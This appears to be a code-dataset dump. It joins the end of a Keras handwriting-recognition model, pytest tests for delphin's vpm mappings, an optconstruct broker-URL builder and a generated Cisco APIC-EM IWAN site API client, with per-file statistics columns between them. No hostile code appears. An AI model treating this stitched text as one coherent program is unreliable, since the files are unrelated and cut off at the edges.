cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
shape = cnn.get_shape()
bgru = keras.layers.Reshape((shape[1], shape[2] * shape[3]))(cnn)
bgru = keras.layers.Bidirectional(keras.layers.GRU(
units=128, return_sequences=True, dropout=0.5))(bgru)
bgru = keras.layers.TimeDistributed(keras.layers.Dense(units=128))(bgru)
bgru = keras.layers.Bidirectional(keras.layers.GRU(
units=128, return_sequences=True, dropout=0.5))(bgru)
output_data = keras.layers.TimeDistributed(
keras.layers.Dense(units=output_shape, activation="softmax"))(bgru)
return (input_data, output_data)
def FlorResAcHTR(input_shape, output_shape):
# https://arxiv.org/pdf/1512.03385.pdf
input_data = keras.layers.Input(name="input", shape=input_shape)
cnn = keras.layers.Conv2D(filters=16, kernel_size=(3, 3), strides=(
2, 2), padding="same", kernel_initializer="he_uniform")(input_data)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn1 = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=16, kernel_size=(3, 3), padding="same")(cnn1)
res1 = keras.layers.add([cnn1, cnn])
rac = keras.layers.PReLU(shared_axes=[1, 2])(res1)
cnn = keras.layers.Conv2D(filters=32, kernel_size=(3, 3), strides=(
1, 1), padding="same", kernel_initializer="he_uniform")(rac)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn2 = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=32, kernel_size=(3, 3), padding="same")(cnn2)
res2 = keras.layers.add([cnn2, cnn])
rac = keras.layers.PReLU(shared_axes=[1, 2])(res2)
cnn = keras.layers.Conv2D(filters=40, kernel_size=(2, 4), strides=(
2, 4), padding="same", kernel_initializer="he_uniform")(rac)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn3 = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=40, kernel_size=(
3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn3)
cnn = keras.layers.Dropout(rate=0.2)(cnn)
res3 = keras.layers.add([cnn3, cnn])
rac = keras.layers.PReLU(shared_axes=[1, 2])(res3)
cnn = keras.layers.Conv2D(filters=48, kernel_size=(3, 3), strides=(
1, 1), padding="same", kernel_initializer="he_uniform")(rac)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn4 = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=48, kernel_size=(
3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn4)
cnn = keras.layers.Dropout(rate=0.2)(cnn)
res4 = keras.layers.add([cnn4, cnn])
rac = keras.layers.PReLU(shared_axes=[1, 2])(res4)
cnn = keras.layers.Conv2D(filters=56, kernel_size=(2, 4), strides=(
2, 4), padding="same", kernel_initializer="he_uniform")(rac)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn5 = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = FullGatedConv2D(filters=56, kernel_size=(
3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn5)
cnn = keras.layers.Dropout(rate=0.2)(cnn)
res5 = keras.layers.add([cnn5, cnn])
rac = keras.layers.PReLU(shared_axes=[1, 2])(res5)
cnn = keras.layers.Conv2D(filters=64, kernel_size=(3, 3), strides=(
1, 1), padding="same", kernel_initializer="he_uniform")(rac)
cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
cnn = keras.layers.MaxPooling2D(pool_size=(
1, 2), strides=(1, 2), padding="valid")(cnn)
shape = cnn.get_shape()
bgru = keras.layers.Reshape((shape[1], shape[2] * shape[3]))(cnn)
bgru = keras.layers.Bidirectional(keras.layers.GRU(
units=128, return_sequences=True, dropout=0.5))(bgru)
bgru = keras.layers.TimeDistributed(keras.layers.Dense(units=128))(bgru)
bgru = keras.layers.Bidirectional(keras.layers.GRU(
units=128, return_sequences=True, dropout=0.5))(bgru)
output_data = keras.layers.TimeDistributed(
keras.layers.Dense(units=output_shape, activation="softmax"))(bgru)
return (input_data, output_data)
| 46.080645
| 95
| 0.673521
| 1,572
| 11,428
| 4.785623
| 0.072519
| 0.166689
| 0.120962
| 0.103948
| 0.864682
| 0.864682
| 0.860827
| 0.860827
| 0.848863
| 0.826266
| 0
| 0.044542
| 0.15917
| 11,428
| 247
| 96
| 46.267206
| 0.73837
| 0.012951
| 0
| 0.727749
| 0
| 0
| 0.036507
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036649
| false
| 0
| 0.026178
| 0
| 0.099476
| 0.005236
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad777552cc89034b8d30c3951a1ee4a89d47357a
| 8,697
|
py
|
Python
|
tests/vpm_test.py
|
arademaker/pydelphin
|
3ebcce48c4edcb4e797fc8e447a80e38e8fef53a
|
[
"MIT"
] | 60
|
2016-05-13T18:35:59.000Z
|
2021-07-13T03:05:23.000Z
|
tests/vpm_test.py
|
arademaker/pydelphin
|
3ebcce48c4edcb4e797fc8e447a80e38e8fef53a
|
[
"MIT"
] | 295
|
2015-10-07T17:02:33.000Z
|
2022-02-03T05:26:16.000Z
|
tests/vpm_test.py
|
arademaker/pydelphin
|
3ebcce48c4edcb4e797fc8e447a80e38e8fef53a
|
[
"MIT"
] | 21
|
2015-10-07T16:36:51.000Z
|
2020-11-15T07:46:34.000Z
|
from io import StringIO as S
import pytest
from delphin import vpm
def test_load(tmp_path):
vpm.load(S('; test vpm\n'
'a : b\n'
' 1 >> 2'))
vpmfile = tmp_path / 'test.vpm'
vpmfile.write_text('; test vpm\n'
'a : b\n'
' 1 >> 2')
vpm.load(vpmfile)
def test_invalid():
with pytest.raises(vpm.VPMSyntaxError):
vpm.load(S('~~'))
with pytest.raises(vpm.VPMSyntaxError):
vpm.load(S('<>'))
with pytest.raises(vpm.VPMSyntaxError):
vpm.load(S('event >< e'))
with pytest.raises(vpm.VPMSyntaxError):
vpm.load(S('a : b\n'
' 1 2 >> 3'))
with pytest.raises(vpm.VPMSyntaxError):
vpm.load(S('a : b\n'
' 1 >> 2 3'))
with pytest.raises(vpm.VPMSyntaxError):
vpm.load(S('a b : c d\n'
' 1 >> 2'))
def test_type_map_single_rule_no_semi():
assert vpm.load(S('event <> e')).apply('event2', {}) == ('e2', {})
assert vpm.load(S('event >> e')).apply('event2', {}) == ('e2', {})
assert vpm.load(S('event << e')).apply('event2', {}) == ('event2', {})
assert vpm.load(S('event == e')).apply('event2', {}) == ('e2', {})
assert vpm.load(S('event => e')).apply('event2', {}) == ('e2', {})
assert vpm.load(S('event <= e')).apply('event2', {}) == ('event2', {})
assert vpm.load(S('event <> e')).apply('event2', {}, reverse=True) == ('event2', {})
assert vpm.load(S('event >> e')).apply('event2', {}, reverse=True) == ('event2', {})
assert vpm.load(S('event << e')).apply('event2', {}, reverse=True) == ('event2', {})
assert vpm.load(S('event == e')).apply('event2', {}, reverse=True) == ('event2', {})
assert vpm.load(S('event => e')).apply('event2', {}, reverse=True) == ('event2', {})
assert vpm.load(S('event <= e')).apply('event2', {}, reverse=True) == ('event2', {})
assert vpm.load(S('event <> e')).apply('e2', {}) == ('e2', {})
assert vpm.load(S('event >> e')).apply('e2', {}) == ('e2', {})
assert vpm.load(S('event << e')).apply('e2', {}) == ('e2', {})
assert vpm.load(S('event == e')).apply('e2', {}) == ('e2', {})
assert vpm.load(S('event => e')).apply('e2', {}) == ('e2', {})
assert vpm.load(S('event <= e')).apply('e2', {}) == ('e2', {})
# It turns out variable type mappings shouldn't apply in reverse..
# assert vpm.load(S('event <> e')).apply('e2', {}, reverse=True) == ('event2', {})
# assert vpm.load(S('event >> e')).apply('e2', {}, reverse=True) == ('e2', {})
# assert vpm.load(S('event << e')).apply('e2', {}, reverse=True) == ('event2', {})
# assert vpm.load(S('event == e')).apply('e2', {}, reverse=True) == ('event2', {})
# assert vpm.load(S('event => e')).apply('e2', {}, reverse=True) == ('e2', {})
# assert vpm.load(S('event <= e')).apply('e2', {}, reverse=True) == ('event2', {})
assert vpm.load(S('event <> e')).apply('e2', {}, reverse=True) == ('e2', {})
assert vpm.load(S('event >> e')).apply('e2', {}, reverse=True) == ('e2', {})
assert vpm.load(S('event << e')).apply('e2', {}, reverse=True) == ('e2', {})
assert vpm.load(S('event == e')).apply('e2', {}, reverse=True) == ('e2', {})
assert vpm.load(S('event => e')).apply('e2', {}, reverse=True) == ('e2', {})
assert vpm.load(S('event <= e')).apply('e2', {}, reverse=True) == ('e2', {})
assert vpm.load(S('* >> a')).apply('event2', {}) == ('a2', {})
assert vpm.load(S('semarg << *')).apply('event2', {}) == ('event2', {})
# assert vpm.load(S('semarg << *')).apply('a2', {}, reverse=True) == ('semarg2', {})
assert vpm.load(S('semarg << *')).apply('a2', {}, reverse=True) == ('a2', {})
def test_type_map_multi_rule_no_semi():
assert vpm.load(S('event <> e\nref-ind <> x')).apply('event2', {}) == ('e2', {})
assert vpm.load(S('event <> e\nref-ind <> x')).apply('ref-ind4', {}) == ('x4', {})
assert vpm.load(S('event >> e\nevent >> wrong')).apply('event2', {}) == ('e2', {})
assert vpm.load(S('event >> e\ne >> wrong')).apply('event2', {}) == ('e2', {})
assert vpm.load(S('event << wrong\nevent >> e')).apply('event2', {}) == ('e2', {})
assert vpm.load(S('event >> e\nevent << u')).apply('event2', {}) == ('e2', {})
# It turns out variable type mappings shouldn't apply in reverse..
# assert vpm.load(S('event >> e\nevent << u')).apply('e2', {}, reverse=True) == ('e2', {})
# assert vpm.load(S('event >> e\nevent << u')).apply('u2', {}, reverse=True) == ('event2', {})
assert vpm.load(S('event >> e\nevent << u')).apply('e2', {}, reverse=True) == ('e2', {})
assert vpm.load(S('event >> e\nevent << u')).apply('u2', {}, reverse=True) == ('u2', {})
assert vpm.load(S('* <> *\n* >> wrong\nwrong << *')).apply('a2', {}) == ('a2', {})
assert vpm.load(S('* <> *\n* >> wrong\nwrong << *')).apply('a2', {}, reverse=True) == ('a2', {})
def test_type_map_single_with_semi():
pass
def test_type_map_multi_with_semi():
pass
def test_prop_map_no_semi():
# single feature, single bidirectional property
v = vpm.load(S('E.TENSE : TENSE\n'
' present <> pres'))
assert v.apply('event2', {'E.TENSE': 'present'}) == ('event2', {'TENSE': 'pres'})
assert v.apply('event2', {'E.TENSE': 'past'}) == ('event2', {})
assert v.apply('e2', {'TENSE': 'pres'}) == ('e2', {})
assert v.apply('e2', {'TENSE': 'pres'}, reverse=True) == ('e2', {'E.TENSE': 'present'})
# single feature, bidirectional wildcard
v = vpm.load(S('E.TENSE : TENSE\n'
' present <> pres\n'
' * <> *'))
assert v.apply('event2', {'E.TENSE': 'present'}) == ('event2', {'TENSE': 'pres'})
assert v.apply('event2', {'E.TENSE': 'past'}) == ('event2', {'TENSE': 'past'})
assert v.apply('e2', {'TENSE': 'pres'}) == ('e2', {})
assert v.apply('e2', {'TENSE': 'pres'}, reverse=True) == ('e2', {'E.TENSE': 'present'})
assert v.apply('e2', {'TENSE': 'past'}, reverse=True) == ('e2', {'E.TENSE': 'past'})
# one-to-many features
v = vpm.load(S('PNG.PN : PERS NUM\n'
' 1sg <> 1 sg\n'
' 1pl <> 1 pl\n'
' 1per <> 1 !\n'
' 1per << 1 *\n'
' 3sg <> 3 sg\n'
' * >> ! !\n'
' ! << * *'))
assert v.apply('event2', {'PNG.PN': '1sg'}) == ('event2', {'PERS': '1', 'NUM': 'sg'})
assert v.apply('event2', {'PNG.PN': '1pl'}) == ('event2', {'PERS': '1', 'NUM': 'pl'})
assert v.apply('event2', {'PNG.PN': '1per'}) == ('event2', {'PERS': '1'})
assert v.apply('event2', {'PNG.PN': '4du'}) == ('event2', {})
assert v.apply('e2', {'PERS': '1', 'NUM': 'sg'}, reverse=True) == ('e2', {'PNG.PN': '1sg'})
assert v.apply('e2', {'PERS': '1', 'NUM': 'pl'}, reverse=True) == ('e2', {'PNG.PN': '1pl'})
assert v.apply('e2', {'PERS': '1'}, reverse=True) == ('e2', {'PNG.PN': '1per'})
assert v.apply('e2', {'PERS': '1', 'NUM': 'du'}, reverse=True) == ('e2', {'PNG.PN': '1per'})
assert v.apply('e2', {'PERS': '4', 'NUM': 'du'}, reverse=True) == ('e2', {})
# var-type conditioned wildcard
v = vpm.load(S('E.TENSE : TENSE\n'
' untensed << [e]'))
assert v.apply('event2', {'E.TENSE': 'present'}) == ('event2', {})
assert v.apply('e2', {}, reverse=True) == ('e2', {'E.TENSE': 'untensed'})
assert v.apply('e2', {'TENSE': 'bogus'}, reverse=True) == ('e2', {})
assert v.apply('x4', {}, reverse=True) == ('x4', {})
# many-to-one features
v = vpm.load(S('E.ASPECT.SOON E.ASPECT.EVER E.ASPECT.ALREADY : TENSE\n'
' bool bool + <> past\n'
' bool + bool <> nonpresent\n'
' + bool bool <> fut'))
assert v.apply('event2', {'E.ASPECT.SOON': 'bool', 'E.ASPECT.EVER': 'bool', 'E.ASPECT.ALREADY': '+'}) == ('event2', {'TENSE': 'past'})
assert v.apply('event2', {'E.ASPECT.SOON': 'bool', 'E.ASPECT.EVER': '+', 'E.ASPECT.ALREADY': 'bool'}) == ('event2', {'TENSE': 'nonpresent'})
assert v.apply('event2', {'E.ASPECT.SOON': '+', 'E.ASPECT.EVER': 'bool', 'E.ASPECT.ALREADY': 'bool'}) == ('event2', {'TENSE': 'fut'})
assert v.apply('e2', {'TENSE': 'past'}, reverse=True) == ('e2', {'E.ASPECT.SOON': 'bool', 'E.ASPECT.EVER': 'bool', 'E.ASPECT.ALREADY': '+'})
assert v.apply('e2', {'TENSE': 'nonpresent'}, reverse=True) == ('e2', {'E.ASPECT.SOON': 'bool', 'E.ASPECT.EVER': '+', 'E.ASPECT.ALREADY': 'bool'})
assert v.apply('e2', {'TENSE': 'fut'}, reverse=True) == ('e2', {'E.ASPECT.SOON': '+', 'E.ASPECT.EVER': 'bool', 'E.ASPECT.ALREADY': 'bool'})
def test_prop_map_with_semi():
pass
| 52.077844
| 150
| 0.496838
| 1,120
| 8,697
| 3.826786
| 0.094643
| 0.09636
| 0.108259
| 0.150257
| 0.861176
| 0.794914
| 0.742184
| 0.716752
| 0.702053
| 0.624825
| 0
| 0.027137
| 0.211912
| 8,697
| 166
| 151
| 52.391566
| 0.598191
| 0.118317
| 0
| 0.198347
| 0
| 0
| 0.288497
| 0
| 0
| 0
| 0
| 0
| 0.53719
| 1
| 0.066116
| false
| 0.024793
| 0.024793
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad8c0c8b8c34c2ea1f14c24c109140498310c329
| 2,238
|
py
|
Python
|
optconstruct/types/composed/brokerurl.py
|
Frawless/option_parser
|
64ad95fe0840aafe3e74fddf3cb7687df86f7913
|
[
"Apache-2.0"
] | null | null | null |
optconstruct/types/composed/brokerurl.py
|
Frawless/option_parser
|
64ad95fe0840aafe3e74fddf3cb7687df86f7913
|
[
"Apache-2.0"
] | null | null | null |
optconstruct/types/composed/brokerurl.py
|
Frawless/option_parser
|
64ad95fe0840aafe3e74fddf3cb7687df86f7913
|
[
"Apache-2.0"
] | null | null | null |
"""
# TODO jstejska: Fill package info
"""
import copy
import reformat
from optconstruct.types import BasicComposed
class BrokerURLnodeJS(BasicComposed):
"""BrokerURL option construct class for nodeJS messaging client."""
composed_keys = {'host'}
def generate(self, data, client=None):
"""Generate option brokerURL option.
:param data: data with specified option's values
:type data: dict
:param client: client's label
:type client: str
:return: option
:rtype: str
"""
_ = client
broker_url = data.get('broker-url', None)
if broker_url is not None:
broker_url = self.prefix + " " + broker_url
return broker_url
credentials = reformat.reformat("%{user|%s}%{password|:%s}", data)
if credentials:
data_copy = copy.deepcopy(data)
data_copy['credentials'] = credentials
else:
data_copy = data
pattern = self._postprocessing("%{credentials|%s@}%{host}%{port|:%s}")
broker_url = self.prefix + " " + reformat.reformat(pattern, data_copy)
return broker_url
class BrokerURLPythonProton(BasicComposed):
"""BrokerURL option parser for Proton-Python messaging client."""
def generate(self, data, client=None):
"""Generate option brokerURL option.
:param data: data with specified option's values
:type data: dict
:param client: client's label
:type client: str
:return: option
:rtype: str
"""
_ = client
broker_url = data.get('broker-url', None)
if broker_url is not None:
broker_url = self.prefix + " " + broker_url
return broker_url
pattern = "%{user|%s}%{password|:%s}"
credentials = reformat.reformat(pattern, data)
if credentials:
data_copy = copy.deepcopy(data)
data_copy['credentials'] = credentials
else:
data_copy = data
pattern = self._postprocessing("%{credentials|%s@}%{host}%{port|:%s}%{address|/%s}")
broker_url = self.prefix + " " + reformat.reformat(pattern, data_copy)
return broker_url
| 27.292683
| 92
| 0.596962
| 241
| 2,238
| 5.431535
| 0.248963
| 0.110008
| 0.039725
| 0.05806
| 0.705118
| 0.705118
| 0.705118
| 0.705118
| 0.705118
| 0.705118
| 0
| 0
| 0.291332
| 2,238
| 81
| 93
| 27.62963
| 0.825347
| 0.227882
| 0
| 0.702703
| 0
| 0
| 0.117573
| 0.085967
| 0
| 0
| 0
| 0.012346
| 0
| 1
| 0.054054
| false
| 0.054054
| 0.081081
| 0
| 0.324324
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ad9695f04458f0dbc4bf34e22a12c97869a235ca
| 18,532
|
py
|
Python
|
apis/nb/clients/visibility_service_client/IwansiteApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts-
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 45
|
2016-06-09T15:41:25.000Z
|
2019-08-06T17:13:11.000Z
|
apis/nb/clients/visibility_service_client/IwansiteApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 36
|
2016-06-12T03:03:56.000Z
|
2017-03-13T18:20:11.000Z
|
apis/nb/clients/visibility_service_client/IwansiteApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 15
|
2016-06-22T03:51:37.000Z
|
2019-07-10T10:06:02.000Z
|
#!/usr/bin/env python
#pylint: skip-file
# This source code is licensed under the Apache license found in the
# LICENSE file in the root directory of this project.
import sys
import os
import urllib.request, urllib.parse, urllib.error
from .models import *
class IwansiteApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def getSiteBySiteNameAndType(self, **kwargs):
"""API to get the iwan site by siteName and/or siteType
Args:
siteName, str: Site Name (required)
siteType, str: Site Type (required)
scope, str: Authorization Scope for RBAC (required)
username, str: requestorUsername (required)
Returns: SiteDTOListResult
"""
allParams = ['siteName', 'siteType', 'scope', 'username']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getSiteBySiteNameAndType" % key)
params[key] = val
del params['kwargs']
resourcePath = '/iwan/site'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('siteName' in params):
queryParams['siteName'] = self.apiClient.toPathValue(params['siteName'])
if ('siteType' in params):
queryParams['siteType'] = self.apiClient.toPathValue(params['siteType'])
if ('scope' in params):
headerParams['scope'] = params['scope']
if ('username' in params):
headerParams['username'] = params['username']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'SiteDTOListResult')
return responseObject
def update(self, **kwargs):
"""API to update the site
Args:
siteDTO, SiteDTO: siteDTO (required)
scope, str: Authorization Scope for RBAC (required)
username, str: requestorUsername (required)
Returns: TaskIdResult
"""
allParams = ['siteDTO', 'scope', 'username']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method update" % key)
params[key] = val
del params['kwargs']
resourcePath = '/iwan/site'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('scope' in params):
headerParams['scope'] = params['scope']
if ('username' in params):
headerParams['username'] = params['username']
if ('siteDTO' in params):
bodyParam = params['siteDTO']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def create(self, **kwargs):
"""API to create the site
Args:
siteDTO, SiteDTO: siteDTO (required)
scope, str: Authorization Scope for RBAC (required)
username, str: requestorUsername (required)
Returns: TaskIdResult
"""
allParams = ['siteDTO', 'scope', 'username']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method create" % key)
params[key] = val
del params['kwargs']
resourcePath = '/iwan/site'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'POST'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('scope' in params):
headerParams['scope'] = params['scope']
if ('username' in params):
headerParams['username'] = params['username']
if ('siteDTO' in params):
bodyParam = params['siteDTO']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def delete(self, **kwargs):
"""API to delete the site by name
Args:
siteName, str: Site Name (required)
scope, str: Authorization Scope for RBAC (required)
username, str: requestorUsername (required)
Returns: TaskIdResult
"""
allParams = ['siteName', 'scope', 'username']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method delete" % key)
params[key] = val
del params['kwargs']
resourcePath = '/iwan/site'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('siteName' in params):
queryParams['siteName'] = self.apiClient.toPathValue(params['siteName'])
if ('scope' in params):
headerParams['scope'] = params['scope']
if ('username' in params):
headerParams['username'] = params['username']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def getPrefix(self, **kwargs):
"""Get IWAN prefix(s) in a site
Args:
siteId, str: siteId (required)
scope, str: Authorization Scope for RBAC (required)
Returns: DCPrefixDTOListResult
"""
allParams = ['siteId', 'scope']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getPrefix" % key)
params[key] = val
del params['kwargs']
resourcePath = '/iwan/site/{siteId}/ip-prefix'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('scope' in params):
headerParams['scope'] = params['scope']
if ('siteId' in params):
replacement = str(self.apiClient.toPathValue(params['siteId']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'siteId' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'DCPrefixDTOListResult')
return responseObject
def getDevice(self, **kwargs):
"""API to get the list of devices associated with the site
Args:
siteId, str: siteId (required)
scope, str: Authorization Scope for RBAC (required)
username, str: requestorUsername (required)
Returns: SiteDeviceListResult
"""
allParams = ['siteId', 'scope', 'username']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDevice" % key)
params[key] = val
del params['kwargs']
resourcePath = '/iwan/site/{siteId}/network-device'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('scope' in params):
headerParams['scope'] = params['scope']
if ('username' in params):
headerParams['username'] = params['username']
if ('siteId' in params):
replacement = str(self.apiClient.toPathValue(params['siteId']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'siteId' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'SiteDeviceListResult')
return responseObject
def getSiteWanLinks(self, **kwargs):
"""Get the wan links connected to a specific site
Args:
siteId, str: siteId (required)
scope, str: Authorization Scope for RBAC (required)
username, str: requestorUsername (required)
Returns: WanLinkDTOListResult
"""
allParams = ['siteId', 'scope', 'username']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getSiteWanLinks" % key)
params[key] = val
del params['kwargs']
resourcePath = '/iwan/site/{siteId}/wan-link'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('scope' in params):
headerParams['scope'] = params['scope']
if ('username' in params):
headerParams['username'] = params['username']
if ('siteId' in params):
replacement = str(self.apiClient.toPathValue(params['siteId']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'siteId' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'WanLinkDTOListResult')
return responseObject
def getSiteBySiteId(self, **kwargs):
"""API to get the iwan site by instance UUID
Args:
siteInstanceUuid, str: siteInstanceUuid (required)
scope, str: Authorization Scope for RBAC (required)
username, str: requestorUsername (required)
Returns: SiteDTOResult
"""
allParams = ['siteInstanceUuid', 'scope', 'username']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getSiteBySiteId" % key)
params[key] = val
del params['kwargs']
resourcePath = '/iwan/site/{siteInstanceUuid}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('scope' in params):
headerParams['scope'] = params['scope']
if ('username' in params):
headerParams['username'] = params['username']
if ('siteInstanceUuid' in params):
replacement = str(self.apiClient.toPathValue(params['siteInstanceUuid']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'siteInstanceUuid' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'SiteDTOResult')
return responseObject
def deleteSiteById(self, **kwargs):
"""API to delete the site by id
Args:
siteInstanceUuid, str: siteInstanceUuid (required)
scope, str: Authorization Scope for RBAC (required)
username, str: requestorUsername (required)
Returns: TaskIdResult
"""
allParams = ['siteInstanceUuid', 'scope', 'username']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method deleteSiteById" % key)
params[key] = val
del params['kwargs']
resourcePath = '/iwan/site/{siteInstanceUuid}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('scope' in params):
headerParams['scope'] = params['scope']
if ('username' in params):
headerParams['username'] = params['username']
if ('siteInstanceUuid' in params):
replacement = str(self.apiClient.toPathValue(params['siteInstanceUuid']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'siteInstanceUuid' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
| 26.323864
| 115
| 0.511763
| 1,451
| 18,532
| 6.533425
| 0.095796
| 0.038397
| 0.035865
| 0.027532
| 0.879641
| 0.879641
| 0.87173
| 0.87173
| 0.865401
| 0.858861
